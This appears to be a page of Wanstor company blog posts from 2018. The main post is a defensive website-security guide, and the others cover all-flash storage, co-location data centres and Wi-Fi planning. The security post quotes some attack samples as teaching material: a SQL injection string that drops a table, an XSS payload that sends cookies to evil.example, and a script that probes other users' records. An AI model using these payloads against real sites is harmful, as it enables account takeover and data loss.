A blog on Website Security

22nd February 2018

At Wanstor this week, we have been discussing website security. This is because of news that the Information Commissioner’s Office (ICO) had to take its website down after a warning that hackers were hijacking visitors’ computers to mine cryptocurrency.

Following this story, some of our customers have been in contact regarding website security and suggested best practices. In light of this, Wanstor’s security experts have come together to develop the following high level guide to website security.

You may not think your website has anything worth hacking, but corporate websites are compromised all the time. Despite what people think, the majority of website security breaches are not carried out to steal data or deface a website. Instead, sites are hacked so their servers can be used as an email relay for spam, or to set up a temporary web server, normally to serve files of an illegal nature. Other common ways to abuse compromised machines include using your company servers as part of a botnet or to mine for Bitcoins. You could even be hit by ransomware. Hacking is regularly performed by automated scripts written to scour the Internet for known website security issues in software. By following the tips below, your website should be able to operate more safely and deter hackers and the automated tools they use.

Keep software updated

It may seem obvious, but making sure you keep all software updated is vital to keeping your site secure. This applies both to the server operating system and to any software you may be running on your website, such as a CMS or forum. When security holes are found in software, hackers are quick to attempt to abuse them. If you are using a managed hosting solution, then your hosting company should take care of any updates, so you do not need to worry about this – unless your hosting company contacts you to tell you to worry!

If you are using third-party software on your website, such as a CMS or forum, you should make sure you are quick to apply any security patches. Most vendors have a mailing list or RSS feed detailing any website security issues. Many developers use tools like Composer, npm, or RubyGems to manage their software dependencies, and a security vulnerability appearing in a package you depend upon but aren’t paying any attention to is one of the easiest ways to get caught out. Make sure you keep your dependencies up to date, and use relevant tools to get automatic notifications when a vulnerability is announced in one of your components.
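
As a simple illustration, the Python sketch below compares installed packages against a hypothetical, hand-maintained advisory list and flags anything older than a known fixed release. In practice you would rely on a dedicated scanner or your package manager’s own audit tooling rather than maintaining such a list yourself.

```python
# A minimal dependency check, assuming a hand-maintained advisory list.
from importlib.metadata import distributions

# Hypothetical advisory data: package name -> first fixed version.
KNOWN_FIXES = {
    "requests": (2, 31, 0),
    "jinja2": (3, 1, 3),
}

def parse_version(text):
    """Turn a version string like '2.28.1' into a comparable tuple."""
    return tuple(int(part) for part in text.split(".") if part.isdigit())

for dist in distributions():
    name = dist.metadata["Name"].lower()
    fixed = KNOWN_FIXES.get(name)
    if fixed and parse_version(dist.version) < fixed:
        print(f"{name} {dist.version} predates the fixed release "
              f"{'.'.join(map(str, fixed))} - update it")
```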

SQL injection

SQL injection attacks occur when attackers use a web form field or URL parameter to gain access to or manipulate your database. When you use standard Transact-SQL, it is easy for attackers to insert rogue code into your query that could be used to change tables, retrieve information and delete data. You can easily prevent this by always using parameterised queries – most web languages have this feature and it is easy to implement.
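
To make the difference concrete, here is a minimal Python sketch using the standard library’s sqlite3 module; the table and column names are illustrative, and the same pattern applies to most database drivers and languages.

```python
import sqlite3

conn = sqlite3.connect("shop.db")  # assumes a local database with a users table
user_supplied = "alice'; DROP TABLE users; --"

# Vulnerable: the user's input is pasted straight into the SQL text.
# query = f"SELECT * FROM users WHERE name = '{user_supplied}'"

# Safe: the driver sends the value separately from the query, so it can
# never be interpreted as SQL, whatever characters it contains.
rows = conn.execute(
    "SELECT * FROM users WHERE name = ?", (user_supplied,)
).fetchall()
```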

XSS

Cross-site scripting (XSS) attacks inject malicious JavaScript into your pages, which then runs in the browsers of your users, allowing page content to be modified or information to be stolen or transmitted to the attacker. For example, if you show comments on a page without validation, attackers might submit comments containing script tags and JavaScript, which could run in every other user’s browser and steal their login cookie, allowing the attacker to take control of accounts owned by each user who views the comment. You need to ensure that users cannot inject active JavaScript content into your pages.

The key here is to focus on how your user-generated content could escape the bounds you expect and be interpreted by the browser as something other than what you intended. This is similar to defending against SQL injection. When dynamically generating HTML, use functions which explicitly make the changes you’re looking for, or use functions in your templating tool that automatically ensure appropriate escaping, rather than concatenating strings or setting raw HTML content.
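
As a rough illustration, the sketch below uses the Python standard library’s html.escape to neutralise a hostile comment before it is placed into a page; good templating engines, such as Jinja2, apply this kind of escaping automatically.

```python
from html import escape

comment = '<script>new Image().src="https://evil.example/?c="+document.cookie</script>'

# Dangerous: raw concatenation would let the comment run as script.
# page = "<div class='comment'>" + comment + "</div>"

# Safe: special characters become harmless entities, so the browser
# renders the comment as text instead of executing it.
page = "<div class='comment'>" + escape(comment) + "</div>"
print(page)
```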

Another powerful tool in the XSS defender’s toolbox is Content Security Policy (CSP). CSP is a header your server can return which tells the browser to limit how and what JavaScript is executed in the page, for example disallowing the running of any scripts not hosted on your domain and disallowing inline JavaScript. Mozilla have an excellent guide with some example configurations. This makes it harder for an attacker’s scripts to work, even if they can get them into your page.
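
As a minimal sketch, here is how a CSP header might be attached to every response in a small Flask application; the policy string shown is illustrative and should be tuned to your own site.

```python
from flask import Flask

app = Flask(__name__)

@app.after_request
def set_csp(response):
    # Only allow scripts served from our own domain; inline <script>
    # blocks and third-party hosts will be refused by the browser.
    response.headers["Content-Security-Policy"] = "script-src 'self'"
    return response
```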

Error messages

Be careful with how much information you give away in error messages. Provide only minimal errors to your users, to make sure they do not leak secrets present on your server. Although tempting, do not provide full exception details either, as these can make complex attacks like SQL injection far easier. Keep detailed errors in your server logs, and show users only the information they need to see.
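
A rough sketch of this split in Python; fetch_from_database is a hypothetical stand-in for your own data-access code.

```python
import logging

logging.basicConfig(filename="app.log", level=logging.ERROR)

def lookup_order(order_id):
    try:
        return fetch_from_database(order_id)  # hypothetical data-access call
    except Exception:
        # The full stack trace goes to the server log for developers...
        logging.exception("order lookup failed for id %r", order_id)
        # ...while the user sees only a generic, non-revealing message.
        return {"error": "Sorry, something went wrong. Please try again."}
```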

Server-side validation

Validation should always be done both in the browser and on the server. The browser can catch simple failures, such as mandatory fields left empty or text entered into a numbers-only field. These checks can be bypassed, however, so you must repeat them, along with deeper validation, on the server side. Failing to do so could allow malicious code or scripting to be inserted into the database, or could cause undesirable results on your website.
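
A minimal server-side validation sketch in Python, with illustrative field names and limits:

```python
def validate_order_form(form):
    """Re-check on the server everything the browser already checked."""
    errors = []
    if not form.get("email", "").strip():
        errors.append("Email is required.")
    quantity = form.get("quantity", "")
    if not quantity.isdigit() or not 1 <= int(quantity) <= 100:
        errors.append("Quantity must be a whole number between 1 and 100.")
    return errors

# A malicious client can skip the browser entirely, so the server
# must never trust the submitted input.
print(validate_order_form({"email": "", "quantity": "abc"}))
```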

Passwords

Everyone knows they should use complex passwords, but that doesn’t mean they always do. It is crucial to use strong passwords for your server and website admin area, but it is equally important to insist on good password practices for your users to protect the security of their accounts. As much as users may not like it, enforcing password requirements such as a minimum of around eight characters, including an uppercase letter and a number, will help to protect their information in the long run. Passwords should always be stored as hashed values, using a one-way hashing algorithm, and never in plain text. Using this method means that when you are authenticating users you are only ever comparing hashed values.

In the event of someone hacking in and stealing your passwords, using hashed passwords helps limit the damage, as they cannot simply be reversed. The best an attacker can do is a dictionary attack or brute force attack, essentially guessing every combination until a match is found. Salting each password with a random value before hashing slows these attacks down further, since every password must then be attacked individually.
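
As an illustration, the sketch below hashes passwords with the Python standard library’s PBKDF2 implementation, using a random per-user salt and a constant-time comparison; the iteration count is indicative only.

```python
import hashlib
import hmac
import os

def hash_password(password, salt=None, iterations=200_000):
    """Derive a salted hash using PBKDF2-HMAC-SHA256 (standard library)."""
    salt = salt or os.urandom(16)  # fresh random salt per user
    digest = hashlib.pbkdf2_hmac("sha256", password.encode(), salt, iterations)
    return salt, digest

def verify_password(password, salt, stored_digest, iterations=200_000):
    candidate = hashlib.pbkdf2_hmac("sha256", password.encode(), salt, iterations)
    # Constant-time comparison avoids leaking information via timing.
    return hmac.compare_digest(candidate, stored_digest)

salt, digest = hash_password("correct horse battery staple")
assert verify_password("correct horse battery staple", salt, digest)
```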

Thankfully, many CMSs provide user management out of the box, with a lot of these website security features built in, although some configuration or extra modules might be required to set the minimum password strength. If you are using .NET then it’s worth using membership providers, as they are very configurable, provide inbuilt website security and include ready-made controls for login and password reset.

File uploads

Allowing users to upload files to your website can be a significant website security risk, even if it’s simply to change their photo, background picture or avatar. The risk is that any uploaded file, however innocent it may look, could contain a script that, when executed on your server, completely opens up your website. If you have a file upload form then you need to treat all files with great suspicion. If you are allowing users to upload images, you cannot rely on the file extension or the MIME type to verify that the file is an image, as these can easily be faked. Even opening the file and reading the header, or using functions to check the image size, is not foolproof. Most image formats allow a comment section to be stored, which could contain PHP code that the server might execute.

So what can you do to prevent this? Ultimately you want to stop users from being able to execute any file they upload. By default web servers won’t attempt to execute files with image extensions, but it isn’t recommended to rely solely on checking the file extension, as a file with a name like image.jpg.php has been known to get through. Some options are to rename the file on upload to ensure it has the correct file extension, or to change the file permissions so it can’t be executed.

In Wanstor’s opinion, the recommended solution is to prevent direct access to uploaded files altogether. Any files uploaded to your website are then stored in a folder outside of the webroot or in the database as a blob. If your files are not directly accessible, you will need to create a script to fetch the files from the private folder (or an HTTP handler in .NET) and deliver them to the browser. An image tag’s src attribute does not have to be a direct URL to an image, so it can point to your file delivery script, provided you set the correct content type in the HTTP header.
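
A minimal sketch of this pattern using Flask; the upload directory path and the id-based filename scheme are assumptions for illustration.

```python
import os

from flask import Flask, abort, send_file

app = Flask(__name__)
UPLOAD_DIR = "/srv/private-uploads"  # assumed location outside the webroot

@app.route("/avatar/<int:user_id>")
def avatar(user_id):
    # Files are renamed to the user's id on upload, so no user-supplied
    # filename ever reaches the filesystem and nothing here is executable.
    path = os.path.join(UPLOAD_DIR, f"{user_id}.img")
    if not os.path.isfile(path):
        abort(404)
    # The browser receives the bytes with an image content type, so an
    # <img src="/avatar/42"> tag works just as if it pointed at a file.
    return send_file(path, mimetype="image/jpeg")
```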

The majority of hosting providers deal with the server configuration for you, but if you are hosting your website on your own server then there are a few things you will want to check. For example, make sure you have a firewall set up and are blocking all non-essential ports.

If you are allowing files to be uploaded from the Internet, only use secure transport methods to your server, such as SFTP or SSH. Where possible, have your database running on a different server to that of your web server. Doing this means the database server cannot be accessed directly from the outside world; only your web server can access it, minimising the risk of your data being exposed. Finally, don’t forget about restricting physical access to your server.

HTTPS

HTTPS is a protocol used to provide security over the Internet. HTTPS guarantees to users that they’re communicating with the server they expect, and that nobody else can intercept or modify the content in transit. If you have anything that your users might want to remain private, it’s highly advisable to use only HTTPS to deliver it. That of course means credit card and login pages. A login form will often set a cookie, for example, which is sent with every other request to your site that a logged-in user makes and is used to authenticate those requests. An attacker stealing this cookie would be able to perfectly imitate a user and take over their login session. To defeat these kinds of attacks, you almost always want to use HTTPS for your entire site.
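
As a sketch, a small Flask application might enforce this with secure cookie settings and an HTTP Strict Transport Security (HSTS) header, which tells returning browsers to refuse plain HTTP for a set period; the configuration below is illustrative.

```python
from flask import Flask

app = Flask(__name__)

# The session cookie is only ever sent over HTTPS and is invisible to
# page JavaScript, blunting both interception and XSS cookie theft.
app.config.update(SESSION_COOKIE_SECURE=True, SESSION_COOKIE_HTTPONLY=True)

@app.after_request
def add_hsts(response):
    # Instruct browsers to use HTTPS only for this site for one year.
    response.headers["Strict-Transport-Security"] = "max-age=31536000"
    return response
```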

Website security tools

Once you think you have done all you can, it’s time to test your website security. The most effective way of doing this is via website security tools, often referred to as penetration testing, or pen testing for short. There are many commercial and free products to assist you with this. They work on a similar basis to the scripts hackers use, in that they test all known exploits and attempt to compromise your site using some of the previously mentioned methods, such as SQL injection.

Some free tools that are worth looking at include:

  • Netsparker (Free community edition and trial version available). Good for testing SQL injection and XSS.
  • OpenVAS claims to be the most advanced open source security scanner. Good for testing known vulnerabilities; it currently scans for over 25,000. But it can be difficult to set up and requires an OpenVAS server to be installed, which only runs on *nix. OpenVAS was a fork of Nessus before Nessus became a closed-source commercial product.
  • SecurityHeaders.io is a tool offering a free online check to quickly report which security headers mentioned above (such as CSP and HSTS) a domain has enabled and correctly configured.
  • Xenotix XSS Exploit Framework is a tool from OWASP (Open Web Application Security Project) that includes a huge selection of XSS attack examples, which you can run to quickly confirm whether your site’s inputs are vulnerable in Chrome, Firefox and IE.

The results from automated tests can be daunting, as they present a wealth of potential issues. The important thing is to focus on the critical issues first. Each issue reported normally comes with a good explanation of the potential vulnerability. You will probably find that some of the issues rated as low or medium in importance aren’t a concern for your site. If you wish to take things a step further, you can manually try to compromise your site by altering POST/GET values. A debugging proxy can assist you here, as it allows you to intercept the values of an HTTP request between your browser and the server. A popular freeware application called Fiddler is a good starting point.

So what should you be trying to alter on the request? If you have pages which should only be visible to a logged-in user, then try changing URL parameters such as the user id, or cookie values, in an attempt to view details of another user. Another area worth testing is forms: change the POST values to attempt to submit code to perform XSS or to upload a server-side script.
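
A rough sketch of this kind of manual probe in Python, using the third-party requests library. The URL, parameter name and ids are hypothetical, and tests like this should only ever be run against a site you own or are explicitly authorised to test.

```python
import requests

BASE = "https://staging.example.com"  # hypothetical test environment
MY_COOKIE = {"session": "paste-your-own-session-token-here"}

# Logged in as user 1001, try to fetch order pages belonging to others.
for other_id in (1002, 1003, 1004):
    resp = requests.get(f"{BASE}/orders", params={"user_id": other_id},
                        cookies=MY_COOKIE, timeout=10)
    if resp.status_code == 200 and "Order history" in resp.text:
        print(f"possible access-control hole: user_id={other_id} is readable")
```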

Hopefully these tips will help keep your site and information safe. Thankfully, most Content Management Systems have inbuilt website security features, but it is still a good idea to have knowledge of the most common security exploits so you can make sure you are covered.

For more information about Wanstor’s IT security solutions, please click here – https://www.wanstor.com/managed-it-security-services-business.htm


Why flash storage is so important to the success of hybrid IT infrastructure

9th February 2018

IT leaders are facing critical decisions on how to best deploy data centre and cloud resources to enable digital transformation. The advantages of cloud models have been written about by many IT industry commentators, experts and opinion makers. Understandably, cloud computing is fundamental to delivering the agility, cost efficiencies and simplified operations necessary for modern IT workloads and applications at scale. However the truth is, even in today’s cloud era, IT leaders still need their own IT infrastructure and data centres to make IT work for their business.

At Wanstor, we believe that today’s and tomorrow’s data centres must support new models for resource pooling, self-service delivery, metering, elastic scalability and automatic chargebacks. They must deliver the performance and agility that the business needs. No longer is it good enough to blame legacy IT equipment for standing in the way of business progress. IT departments must reduce complexity by leveraging technologies and architectures that are simple to deploy and manage, and achieve levels of automation, orchestration and scalability that are not possible within data centres that operate in isolation.

At Wanstor we have been thinking about the future of the data centre. We believe many IT departments are missing the fundamental question when reviewing their existing infrastructure plans, and that is:

How does the data storage strategy integrate within existing and future company owned IT infrastructure and public cloud infrastructures?

At Wanstor we believe the answer to the “storage strategy” question lies in a strategy that is built on all-flash and no longer relies on cumbersome disks and tapes. All-flash storage is the single most important change an IT Manager will need to make to successfully build their future hybrid infrastructure model. Without a flexible and scalable all-flash storage architecture, the future data centre and hybrid cloud model fails. The performance, cost efficiencies, simplicity, agility and scalability the modern IT department will need to successfully serve their business cannot be achieved without all-flash storage as the infrastructure foundation.

So how do IT Managers leverage the benefits of all-flash storage to build a service-centric data storage infrastructure required for their business? What are some of the innovations in pricing models and all-flash storage architectures that will help them create a cost-efficient, scalable, resilient and reliable hybrid IT infrastructure?

The first thing IT Managers need to recognise is that moving to all-flash storage for a truly hybrid IT infrastructure is not simply a matter of taking an extra step and buying some more kit, nor is it a case of ripping everything out and starting all over again. Instead, it is an iterative process that will take place over a period of time, depending on how mature a business’s IT infrastructure model is at the moment and what IT needs to deliver for business success in the future.

Migrating applications onto all-flash storage

If you are an IT decision maker, you will know that your business has probably spent quite a bit of budget and a significant amount of effort to make sure business-critical applications are supported by an underlying IT infrastructure that is reliable, robust and resilient. Indeed, you are probably beginning to experience performance challenges with a range of applications, particularly those that require high levels of IOPS. But applications and workloads that might see only incremental improvements through faster, more responsive storage are unlikely to be the first place where IT will deploy all-flash systems. Instead, the IT Manager is likely to have specific applications and workloads where the performance challenges of spinning disk storage are difficult to overcome and the underlying storage infrastructure needs to be modernised to avoid putting the business at risk. Typical applications and workloads at this stage include databases supporting online transaction processing solutions for e-commerce, infrastructures supporting DevOps teams, and industry-specific applications which require levels of performance that traditional disk storage simply cannot deliver.

To understand which applications should be moved to all-flash storage first, it is important to do three things:

  • Understand the business’s own requirements for data storage, applications and budget considerations, and identify those workloads that are causing the most pain or providing the best opportunity to use all-flash storage to drive measurable business improvements.
  • Evaluate the benefits of all-flash storage solutions and how they can be applied to enhance and strengthen particular applications and workloads.
  • Compare leading all-flash solutions and determine which features, functions and pricing models will maximise the IT department’s ability to modernise workloads and begin the journey to an IT infrastructure model based around flash storage.

When evaluating the benefits of all flash storage, Wanstor believes IT Managers should consider the following critical factors:

Performance – All-flash storage will deliver performance that is at least 10 times greater than that of traditional disks. When thinking about performance, do not focus solely on IOPS; it is also about consistent performance at low latency. Make sure an all flash architecture is deployed that delivers consistent performance across all workloads and I/O sizes, particularly if starting with multiple workloads.

Total Cost of Ownership – The price of flash storage has come down dramatically in the past 12 months. If the IT and finance teams looked at flash several years ago and were scared off by the price, it is time to explore flash storage again. In fact, some all-flash storage providers now have prices as low as £1k per TB of data (a toy cost calculation follows this list of factors).

Smaller storage footprint – This will happen through inline de-duplication and compression, along with thin provisioning, space-efficient snapshots and clones. In some cases the storage footprint can be reduced by a ratio of 5:1, depending upon the application and workload.

Lower operational overheads – Through faster, simpler deployments, provisioning and scaling, and through cost savings as less manual maintenance is required.

Availability and resiliency – All-flash arrays utilise a stateless controller architecture that separates the I/O processing plane from the persistent data storage plane. This architecture provides high availability (greater than 99.999%) and non-disruptive operations. The IT Manager can update hardware and software and expand capacity without reconfiguring applications, hosts or I/O networks, and without disrupting applications or sacrificing performance.

Simpler IT operations – Many all-flash arrays are now plug and play, so simple that they can often be installed in less than an hour. Additionally, storage administrators do not have to worry about configuration tuning and tweaking, saving hours of effort and the associated expense.
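
As promised above, here is a toy illustration of how the £1k per TB price point and a 5:1 data reduction ratio combine; the ratio is workload dependent and the numbers are purely indicative.

```python
list_price_per_tb = 1000  # GBP per raw TB, the figure quoted above
data_reduction = 5        # 5:1 dedupe/compression ratio, workload dependent

effective_price = list_price_per_tb / data_reduction
print(f"effective cost: ~GBP {effective_price:.0f} per usable TB")
# -> effective cost: ~GBP 200 per usable TB
```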

Consolidation – The next stage of moving more applications to flash storage

Once you have put your first applications on an all-flash storage array, the improvements in performance should be enough for the IT and finance teams to decide to invest further in the technology and really accelerate their journey to a flash storage based IT infrastructure.

Most IT leaders will want to expand the benefits they have seen from the initial deployment of flash storage to additional applications and workloads across the data centre. As the all-flash storage solution expands to additional applications, IT Managers will find that TCO benefits increase substantially. Because all-flash storage supports mixed workloads, IT Managers will be able to consolidate more applications on fewer devices, reducing IT infrastructure capital expenditure. By consolidating, IT Managers will also be able to maximise many of the cost savings mentioned earlier in this article (lower energy consumption, less floor space, reduced software licensing fees, etc.).

In dense mixed-workload environments, the TCO of a flash storage solution will typically be 50% to 70% lower than that of a comparably configured traditional disk solution. Beyond the specific cost savings, the performance gains across more applications will drive significant business improvements and new opportunities, resulting in a more agile IT infrastructure.

Additionally, the right all-flash storage architecture will help future-proof storage infrastructure, so that the investments being made today will continue to provide value as all flash storage usage is expanded across the business.

Building a business-ready cloud on all-flash storage

What do IT departments want and need from their cloud infrastructures? How can they leverage the cost savings and agility of the public cloud model, and link it to the control, security, data protection and peace of mind which can be achieved with an on-premises cloud infrastructure?

From Wanstor’s recent experience, many IT Managers want it all when it comes to cloud computing. They want to be able to provide all the features, functions and flexibility available from the leading public cloud service providers within their own IT infrastructure constraints. For many IT departments, deploying cloud models similar to those of the big three cloud providers in a private cloud environment is simply unrealistic, as the big three public cloud operators have far more cash, resources and availability across their infrastructure platforms.

If the IT department is unable to provide a better alternative to a public cloud solution, it is highly likely users within a business will feel the need to go to the public cloud. This creates a fertile ground for shadow IT initiatives that can cause security problems and other risks.

Beyond delivering public cloud-like features and functionality, the IT department may also want to improve in areas where the public cloud can fall short. Performance is one example: if you want to use cloud services to support high-performance computing, big data analytics or other important next-generation IT initiatives, it is likely the IT team will have to pay a premium to a public cloud service provider to match the business’s requirements.

Security is another critical area where building your own cloud infrastructure will give the IT department much greater control and peace of mind, particularly as they begin thinking about supporting the most important business applications and data in the cloud. As the IT department moves from the first all-flash applications through consolidation and toward the all flash cloud, an important step will be to bridge the virtualization gap between servers and the rest of the IT infrastructure, namely storage and networking.

To deliver a basic cloud-type service based on a flash storage platform, IT’s list of wants must include:

Shared resources through automated processes – Users should be able to go straight to an on-premises cloud and choose the storage capacity and performance they need, for as long as they need it.

Automated metering and charging – Once users have chosen the resources they want, the cloud infrastructure should be able to meter their usage and create an automated chargeback mechanism so they pay for what they actually used.

Scalability – Once resources are used, they go back into the pool and become available to other users and departments. As storage capacity and performance requirements grow, the storage platform should be simple to upgrade, update and scale. With virtualization across servers, storage and networking, an all-flash storage array becomes the foundation for a cloud infrastructure.

In this article we have discussed all-flash storage and the foundation it provides for a truly hybrid IT infrastructure. Without the benefits of all-flash storage, businesses will not be able to modernise their infrastructures to deliver cloud services. It is no coincidence that the largest cloud providers rely on all-flash storage solutions as their storage foundation. As discussed, you can take the journey in stages, starting small with a single application or two and then adding more applications through consolidation and virtualization. You can also implement multiple stages at once, or do everything at once with all-flash storage solutions.

At Wanstor we believe the time for flash storage is now. The technology is great and at a price point where most businesses will see a return on their storage investments within 12 months due to the improved performance they receive across their business operations.

For more information about flash storage and how Wanstor can help your business with its IT infrastructure strategy and storage platforms, please visit https://www.wanstor.com/data-centre-storage-business.htm


Is your data centre under capacity and cost pressures? A co-location strategy may provide the answer

25th January 2018

For many businesses, the data centre is critical to a successful day-to-day operation. But data centres are under pressure, not only from the volume of data they have to store and process for a business, but also from rising power costs, new environmental responsibilities which need to be adhered to, rapidly evolving data centre technologies, and the escalating costs of security, cooling, connectivity, management and maintenance. This means that when many businesses reach a certain capacity in their data centre, the IT department can no longer simply ask finance for the funds to build another one. Instead they need to explore other options, and usually it comes down to a choice of two things – retrofit the existing data centre or switch to a co-location provider.

At Wanstor we understand that for many businesses there are a number of ‘non-negotiables’ when it comes to the performance of their data centres.

Maintaining stable, secure power – Evolving technologies and changing service requirements affect power and cooling demands. Today’s data centre energy costs are substantial. At Wanstor we have seen some customers spending upwards of 70% of their operational costs just to keep an existing data centre operation running smoothly. Finding a way to control those costs is often a significant driver for businesses to move to hosted data centre solutions.

Redundancy and reliability – Most data centres have backup options for power in case of outages (UPS and a diesel generator). Many businesses spend a lot of time having to upgrade these assets each year to make sure they are in line with their data centres’ changing power requirements.

Keeping data safe – At Wanstor we believe data can be used in a variety of ways to transform a business, but how it is stored, managed and maintained brings another side to it – RISK. Privacy has to be protected. Confidential information must be safeguarded. Industry compliance requirements and UK and EU regulations must be met. IT Managers need to know whether their company’s data is stored on UK soil. Additionally, the constant stream of new developments in IT and physical security, driven by the continued evolution of IT security threats, means that many IT Managers are not confident their own data centres and systems are as secure as possible.

Growth vs Cost – Expand too quickly or too much and the IT Manager risks wasting resources. Limit growth and the IT Manager risks inhibiting the business’s potential. Building a brand-new data centre gives the IT Manager the flexibility to customise a build for their business. However, the advantages of a newly built data centre are usually wiped out when the finance team sees the high costs of construction, the difficulty of selecting the right build partner and the lack of appropriate locations. Indeed, as so much is expected of modern data centres, only large enterprises appear to be building them in today’s market. This is backed by Forrester Research, which estimates co-location is 37% less expensive than building your own data centre, based on costs over a 15-year period. This means that for many small and medium sized companies, the only real solution available when they run out of data centre space is to outsource to a co-location provider.

Is hosting the right choice for your business?

For many small and medium sized businesses, moving to a hosted data centre model can be an effective way of offsetting the challenges associated with operating and maintaining their own data centre. At Wanstor we believe IT Managers should examine the types of questions below before deciding whether or not a hosting solution is the right choice for their business. Answering them should give an IT Manager a relatively quick view on insourcing versus outsourcing their data centre:

What are you looking to achieve with your data centre operations?

  • Address increasing power and cooling requirements?
  • Maximise uptime, availability and redundancy?
  • Keep technology up to date in an ever changing world?
  • Strengthen physical and data security?
  • Increase capacity whilst reducing power costs?
  • Investigate ways to optimise operational performance across systems and people?
  • Make sure IT teams are focussed on core business offerings?
  • Improve the efficiency and effectiveness of IT resource management and support?
  • Create a predictable cost model?
  • Reduce operational complexity and risk?

By defining what IT and the business wants to achieve with a new data centre, IT Managers can then scope the solution their business needs. Quite often when financial metrics are applied to outcomes IT Managers will conclude that outsourcing to a co-location provider is usually a third cheaper than building a new data centre themselves. This means in the majority of cases the decision will be made to outsource to a co-location provider.

Once the decision to outsource data centre operations to a co-location provider has been made, it is important for the IT Manager to take the time to understand the key characteristics of a dependable co-location data centre. At Wanstor we believe when evaluating a provider’s facilities, IT Managers need to take a close look at the data centre’s capabilities, strengths and potential weaknesses.

From our extensive experience at Wanstor we believe important questions to ask a potential co-location provider include:

What tier ranking is the facility designed to meet? Does your business really need a Tier 4 facility (which you pay a significant amount more for) or will a Tier 3 data centre suffice?

What is your downtime tolerance level and can the facility meet your businesses uptime needs? Remember downtime can affect your business – in terms of revenue, customer experience and brand image.

What security measures are in place? As hosted data centres house multiple customers, advanced security features should be in place, including 24/7 x 365 on-site security, network security (intrusion detection, virtualized firewalls and load balancers), and the ability to monitor lines for traffic. At Wanstor we always recommend that IT Managers take the time to discover how much control a provider has over the network that will be delivering hosted data centre services. Additionally, it would be wise to ask about managed protection against DDoS attacks, event management and any other security services essential to your business.

Scalability – What are the options? As a business grows, it will need more data centre space and scalable capacity. Additionally any hosted data centre facility that is chosen should be able to adopt new technologies quickly. Cloud services and fully-managed virtualized environments offer many businesses an opportunity to enhance scalability and refocus key IT resources on revenue generating activities. You may not need these services today, but having your data hosted is usually a long-term decision because moving is expensive and risky. So IT Managers need to think beyond the initial contract term and make sure they have room to grow, and some allowance to meet future needs.

Auditing – When transferring data and applications to a data centre, the IT department are also transferring compliance responsibilities. Therefore the IT Manager should check that their data centre provider has the relevant compliance certifications and ask for proof of them.

Power consumption model – Service reliability will depend on a co-location provider’s ability to measure, monitor and allocate power usage. In an over-subscription power allocation model, a single reading is used for the entire data centre. Unused power from one customer can be resold to another and spikes in power demand from other customers can drain your resources. In the power reservation model, you get the total capacity you’ve paid for, whether or not you use it. You’ll always have enough energy to run your systems, and close monitoring ensures the provider can quickly detect and respond to any increases in your demand. This prevents the situation where one customer has the ability to affect another customer’s environment.

What environmental initiatives are included? Integrated sustainable energy technology is good both for operational cost savings and for the environment. Time should be taken to consider the co-location provider’s environmental track record; look for advancements such as virtualized environments, free cooling solutions and heat exchangers. All of these can be reliable, cost-effective alternatives to traditional technologies. Many service providers today aspire to improve their power usage effectiveness (PUE), an industry measure of energy efficiency (a quick worked example follows this list of questions). A service provider with good PUE will also help keep power costs down.

Connectivity – The network linking a provider’s data centres is a critical component of their offering. Data centres typically process large volumes of traffic, and the network that connects the data centres to each other and to the business needs to sustain those volumes reliably and securely at all times. The physical location of data centres is also important, as providers often space out their facilities to minimise the risk of a mass disruption. But many data centre applications are sensitive to latency: the further your data needs to travel, the more likely it is that delay becomes an issue. Evaluating the connectivity performance and options of a co-location provider is therefore crucial.
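
As a quick reference for the PUE figure mentioned above: PUE is simply the total power drawn by the facility divided by the power consumed by the IT equipment itself, so 1.0 is the theoretical ideal. The figures below are invented for illustration.

```python
def pue(total_facility_kw, it_equipment_kw):
    """PUE = total facility power / IT equipment power (1.0 is ideal)."""
    return total_facility_kw / it_equipment_kw

# Illustrative only: a 1,500 kW facility whose IT load is 1,000 kW.
print(f"PUE = {pue(1500, 1000):.2f}")  # 1.50: each IT watt costs 0.5 W extra
```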

Beyond the characteristics of the data centre itself, the IT Manager will also want to be confident in a provider’s ability to meet business needs. Other questions the IT Manager should be asking alongside exploring the key areas above include:

What kind of network does the provider operate? How does the network cope with spikes in demand? What are the latency levels for different applications?

What kind of service-level agreements (SLAs) are offered? Are the hosting and connectivity service levels aligned and provided by the same provider? If they are not aligned, this could spell trouble, as one service may operate better than the other, leaving a range of performance issues.

Are professional services available to help with understanding technology options/upgrades? One size does not fit all. The right data centre provider will assess your needs, current capabilities and future plans, and will work with you to find a solution that meets your unique business goals.

Can services be scaled quickly and easily? IT needs will certainly continue to evolve, and not always in ways the IT Manager can predict. Look for power and capacity that can be scaled quickly, giving you the energy, space and bandwidth you need to grow your business.

Does the provider offer virtual hosting and cloud solutions? Dedicating a server to each application and configuring it to handle peak loads can be inefficient. Moving your applications to a virtual server farm can help keep costs low and give you the advantage of architectural flexibility. Virtual solutions also scale up quickly and easily, without requiring the IT Manager to invest in any hardware. Look for a provider equipped with the latest virtual service offerings, such as Infrastructure as a Service (IaaS), which gives IT complete control over capacity and charges only for the services used.

Does the provider invest continually in infrastructure and cloud capabilities? One of the benefits of moving to a hosted data centre model is taking advantage of new technology. A good provider will constantly invest in upgrades and advances e.g. by integrating cloud capabilities or adopting the latest innovations in physical and data security.

Are costs predictable? Working with a data centre provider will give you access to a sophisticated infrastructure without incurring significant capital costs. Make sure the monthly costs associated with the hosted service are stable and predictable, and challenge anything out of the norm, such as unforeseen maintenance requirements.

This article should help IT Managers think about co-location data centre solutions when they are reaching the limits of their own data centre infrastructure. For more information about Wanstor data centre co-location services download our brochure here.


Getting Wi-Fi implementation right – some best practice tips

15th January 2018

Many businesses are failing to take advantage of their Wi-Fi deployments. At Wanstor, we are finding that it is the planning and implementation of Wi-Fi deployments that make or break a successful Wi-Fi solution. To set up a successful enterprise Wi-Fi solution, Wanstor has developed a set of best practices.

By following the practices below, we believe any business can quickly and efficiently replace wired LAN access services in existing workspaces and implement Wi-Fi in new locations. So what are the secrets to Wi-Fi deployment success?

  • Plan for the future – Quite often businesses only plan for Wi-Fi usage which will satisfy user demands today and not the future. This means the investment will satisfy an immediate need, but as we have seen in many businesses, Wi-Fi usage continues to grow at an exponential rate as video, voice and general internet usage increase. IT Managers should therefore take the time to understand their business’s Wi-Fi needs both now and up to three years into the future, to make sure a robust, reliable and ever-ready Wi-Fi network is in place.
  • Start incrementally with Proofs of Concept (PoCs), staged deployments, and standardised components – This will help you to evaluate where and when traffic flows and whether there are problems with certain devices or areas of buildings.
  • Design for the best possible end user experience – Make sure your Wi-Fi design takes into account user needs and the activities they are likely to be undertaking on the Wi-Fi network. For example, is your Wi-Fi network set up so that live video can be streamed and high-bandwidth applications used, and can it cope with several devices connecting at once?
